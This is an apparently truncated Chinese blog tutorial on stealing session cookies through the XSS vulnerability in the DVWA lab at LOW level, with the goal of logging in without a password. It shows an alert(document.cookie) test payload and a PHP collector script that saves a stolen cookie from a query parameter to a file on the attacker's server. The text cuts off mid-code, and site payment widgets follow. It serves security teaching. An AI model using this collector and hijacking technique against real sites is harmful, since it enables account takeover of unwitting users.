使用XSS漏洞获取用户cookie并免密登录实验

本文介绍了如何利用DVWA平台的XSS漏洞(LOW等级)获取用户cookie,并通过创建PHP脚本来保存cookie,从而实现免密码登录。讲解了在Web服务器上编写脚本的注意事项,以及如何在用户不知情的情况下触发XSS,演示了如何修改cookie以绕过密码验证直接访问受保护的页面。
摘要由CSDN通过智能技术生成

使用XSS漏洞盗取cookie,并绕过密码登录

首先环境的搭建,使用DVWA平台的XSS漏洞,这个DVWA的XSS漏洞在前面都讲过,所以我们直接使用LOW等级获取cookie,并保存在Web服务器上,这里使用LOW等级是为了方便,其他等级都是一样的做法,只是构造的脚本不同

使用脚本获取cookie

<script>alert(document.cookie)</script>

这是一个很简单的XSS漏洞,可以弹出用户的cookie,但是现在我们不是要将cookie弹出,而是将其保存在其他服务器上,我们可以获取到这个cookie,然后利用cookie绕过密码登录

首先我们编写一个可以获取cookie,并且保存为文件的php文件

<?php

$cookie = $_GET['x'];

$myFile = "cookie.txt";

file_put_contents($myFile, $cookie);

?>

注意:要在目录下写创建或修改文件,一定要有写权限,一般目录的用户是root用户和用户组用户写权限,但是其他用户是没有的,就导致本地可以运行php创建文件,但是通过web就不可以,因为web是服务器平台权限,比如Apache搭建的网站,创建文件就是Apache用户

然后搭建一个我们的网站,用来接收cookie,将上述代码写入名为cookie.php的文件中,并存放在网站根目录下,保证我们可以访问到这个文件`

Cookie.php

<?php

$cooki
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值